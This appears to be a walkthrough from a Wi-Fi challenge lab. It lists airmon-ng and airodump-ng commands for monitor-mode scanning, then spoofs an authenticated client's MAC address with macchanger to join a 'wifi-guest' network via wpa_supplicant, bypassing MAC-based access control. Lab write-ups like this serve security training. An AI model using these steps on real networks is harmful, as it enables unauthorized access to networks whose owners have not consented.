# Setup monitor mode
sudo airmon-ng check kill
sudo airmon-ng start wlan0
# Scan networks & AP's
sudo airodump-ng wlan0mon
2. Find authenticated clients
sudo airodump-ng wlan0mon --band abg --bssid F0:9F:C2:71:22:10 -c 6
3. Change our own mac to authenticated mac
ip link set wlan2 down
macchanger -m b0:72:bf:44:b0:49 wlan2
ip link set wlan2 up
Once we know your ESSID we can connect to the network, for that we create a “free.conf’ file to connect from bash using “wpa_supplicant”.
root@WiFiChallengeLab:~# cat free.conf
network={
ssid="wifi-guest"
key_mgmt=NONE
scan_ssid=1
}
wpa_supplicant -Dnl80211 -iwlan2 -c free.conf
